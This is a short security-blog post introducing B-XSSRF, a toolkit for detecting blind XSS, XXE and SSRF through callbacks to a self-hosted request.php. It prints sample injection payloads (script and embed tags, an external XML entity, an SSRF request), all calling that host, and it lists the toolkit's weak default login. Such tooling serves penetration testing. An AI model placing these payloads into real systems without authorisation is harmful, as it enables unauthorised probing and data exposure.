B-XSSRF : Toolkit To Detect & Keep Track On Blind XSS, XXE & SSRF

B-XSSRF is a toolkit to detect and keep track on Blind XSS, XXE & SSRF.

Read More – RedHunt OS : Virtual Machine for Adversary Emulation & Threat Hunting

SETUP

  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.

USAGE

BLIND XSS

<embed src=”http://mysite.com/bxssrf/request.php”>
<script src=”http://mysite.com/bxssrf/request.php”>

BLIND XXE

<?xml version=”1.0″ ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM “http://mysite.com/bxssrf/request.php”> %ext;
]>
<r>

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS

USER : admin@test.com
PASS : 123456

Download
R K

Share
Published by
R K
Tags: B-XSSRFBlind XSSBlind XXESSRF
5 years ago

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

2 days ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

2 days ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

4 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

7 days ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago